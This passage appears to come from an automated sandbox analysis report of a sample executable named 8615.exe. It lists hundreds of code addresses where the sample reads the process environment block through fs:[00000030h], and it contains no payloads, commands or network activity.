                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5223E3 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5223E3 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B483BF4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B483BF4 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52D380 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474B94 mov edi, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53138A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B51EB8A mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B51EB8A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B51EB8A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B51EB8A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548BB6 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4BAD mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4BAD mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4BAD mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B549BBE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531BA8 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472240 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472240 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479240 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479240 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479240 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479240 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B504257 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B504248 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B927A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52B260 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52B260 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548A62 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B488A0A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B493A1C mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475210 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475210 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475210 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475210 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52D208 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52D208 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474A20 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474A20 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4FEA20 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B478239 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B478239 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B478239 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2ACB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475AC0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475AC0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475AC0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548ADD mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473ACA mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2AE4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ADA88 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ADA88 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AD294 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AD294 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B471AA0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A5AA0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A5AA0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A12BD mov esi, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A12BD mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A12BD mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48AAB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48AAB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49B944 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49B944 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47395E mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47395E mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53E962 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548966 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47B171 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47B171 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479100 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479100 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479100 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B480100 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B480100 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B480100 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B494120 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A513A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A513A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473138 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47B1E1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47B1E1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47B1E1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4731E0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5489E7 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5041E8 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49C182 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AA185 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47519E mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47519E mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53A189 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53A189 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4190 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2990 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54F1B5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54F1B5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A61A0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A61A0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AC9BF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AC9BF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B477055 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475050 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475050 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475050 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B532073 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B541074 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49F86D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B544015 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B544015 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476800 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476800 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476800 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B488800 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54F019 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54F019 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47F018 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47F018 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4020 mov edi, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4770C0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4770C0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4740E1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4740E1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4740E1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4758EC mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49B8E4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49B8E4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4828FD mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4828FD mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4828FD mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52E0E9 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52E0E9 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473880 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473880 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B90AF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4828AE mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4838A4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4838A4 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AF0BF mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AF0BF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AF0BF mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47E8B0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47A745 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ADF4C mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B505F5F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACF6A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACF6A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476F60 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476F60 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49E760 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49E760 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h]
